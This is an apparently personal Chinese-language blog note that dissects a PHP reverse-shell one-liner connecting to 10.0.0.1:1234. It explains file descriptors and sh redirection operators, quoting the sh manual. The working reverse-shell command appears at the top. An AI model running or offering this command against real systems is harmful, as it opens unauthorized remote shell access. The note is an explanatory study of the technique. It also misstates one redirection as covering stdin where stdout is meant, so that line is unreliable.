一条命令引发的思考

这条命令是

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

作用是反弹一个交互式的shell

代码看得不太懂，所以很有必要了解一下。

-i interactive Force the shell to behave interactively.

文件描述符，内核（kernel）利用文件描述符（file descriptor）来访问文件。文件描述符是非负整数。打开现存文件或新建文件时，内核会返回一个文件描述符。

0       stdin
1       stdout
2       stderr

Control operators:
& && ( ) ; ;; | || <newline>

Redirection operators:
< > >| << >> <& >& <<-  <>

[n]> file   Redirect standard output (or n) to file.      
[n]>| file  Same, but override the -C option.         
[n]>> file  Append standard output (or n) to file.         
[n]< file   Redirect standard input (or n) from file.         
[n1]<&n2    Duplicate standard input (or n1) from file descriptor
 n2.        
[n]<&-      Close standard input (or n).         
[n1]>&n2    Duplicate standard output (or n1) to n2.
[n]>&-      Close standard output (or n).  
[n]<> file  Open file for reading and writing on standard input (or
 n).

Background Commands -- &
If a command is terminated by the control operator ampersand (&), the
     shell executes the command asynchronously -- that is, the shell does not
    wait for the command to finish before executing the next command.

“&&” and “||” are AND-OR list operators.

算是看明白了

创建一个连接到 10.0.0.1:1234 的socket ，得其文件描述符 3。

执行 /bin/sh -i 得到一个交互式的shell

<&3 重定向用户输入的命令到shell

>&3 2>&3 将stdin 和 stderr 重定向到socket

known it then hack it.